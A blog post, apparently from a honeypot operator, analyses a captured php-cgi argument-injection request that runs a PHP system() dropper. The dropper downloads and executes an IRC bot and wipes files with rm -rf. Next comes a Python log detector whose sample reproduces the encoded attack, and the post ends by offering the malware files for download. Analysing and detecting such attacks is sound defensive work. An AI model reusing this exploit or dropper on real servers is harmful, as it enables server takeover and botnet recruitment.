Sunday, 19 July 2015

Encoded bot execution, including attack IPs

2015-07-19 16:28:52
Source IP:
Country: US RiskScore: 1 Malware: []
POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d
f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

<? system("cd /tmp ; wget ; curl -O ; fetch ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>
This is a really, really nice one.
The seed.jpg is basically just a script to download the original payload:
cd /var/tmp/ ;wget; curl -O; fetch; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/ ; rm -rf *; wget;fetch ;curl -O; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun
This script leads to the download of two files, index.htm and stats.php. Both are gzipped tar archives.
  • index.htm is an IRC bot; the name of the unzipped file is
  • The second file is the nicer one:
    it includes a full folder structure, which can be found in .d

    The file bang.txt includes a list of more than 15,000 IP addresses.
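The percent-encoded request target at the top of the post is a php-cgi argument injection: every "-d" sets a php.ini directive, and auto_prepend_file=php://input makes the POST body run as PHP code. The following Python detector is an added example, not code from this post; it assumes Apache combined-format or bare request lines as input, and the sample log it scans is constructed (placeholder client IPs, attack line re-encoded from the decoded request above).

```python
import re
from urllib.parse import unquote_plus

# php.ini overrides present in the captured query string once percent-decoded;
# any of them on the php-cgi command line is a strong sign of this attack.
DANGEROUS_DIRECTIVES = {
    "allow_url_include", "auto_prepend_file", "safe_mode",
    "open_basedir", "cgi.force_redirect", "cgi.redirect_status_env",
}
# Request target in either a bare request line or a combined-format log line.
REQUEST_RE = re.compile(r'(?:^|")(?:GET|POST|HEAD|PUT|OPTIONS) (\S+) HTTP/\d\.\d')
DIRECTIVE_RE = re.compile(r"-d\s+([\w.]+)=(\S*)")

def find_injected_directives(log_line):
    """Return the decoded '-d key=value' overrides carried in the query string.
    A query string with no unencoded '=' is passed to the CGI program as argv
    (RFC 3875, section 4.4), so attackers encode '=' as %3d; a query with a
    literal '=' is an ordinary parameter list and is ignored."""
    match = REQUEST_RE.search(log_line)
    if not match or "?" not in match.group(1):
        return []
    raw_query = match.group(1).split("?", 1)[1]
    if "=" in raw_query:
        return []
    decoded = unquote_plus(raw_query)  # '+' separates the argv words
    return [f"{key}={value}" for key, value in DIRECTIVE_RE.findall(decoded)]

def is_php_cgi_injection(log_line):
    """True when at least one injected override targets a dangerous directive."""
    return any(item.split("=", 1)[0] in DANGEROUS_DIRECTIVES
               for item in find_injected_directives(log_line))

def scan_log(lines):
    """Map 1-based line numbers to the decoded overrides of every flagged line."""
    return {n: find_injected_directives(line)
            for n, line in enumerate(lines, 1) if is_php_cgi_injection(line)}

# Constructed sample log (placeholder client IPs; the attack line is re-encoded
# from the decoded query at the top of the post), not a real capture.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jul/2015:16:28:52 +0200] "POST //%63%67%69%2d%62%69%6e/%70%68%70'
    '?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65'
    '%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65'
    '%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1" 200 188',
    '203.0.113.7 - - [19/Jul/2015:16:30:01 +0200] "GET /index.php?page=home HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, overrides in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: php-cgi argument injection, overrides={overrides}")
```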
I uploaded all files to my Google Drive:
The password is "danger".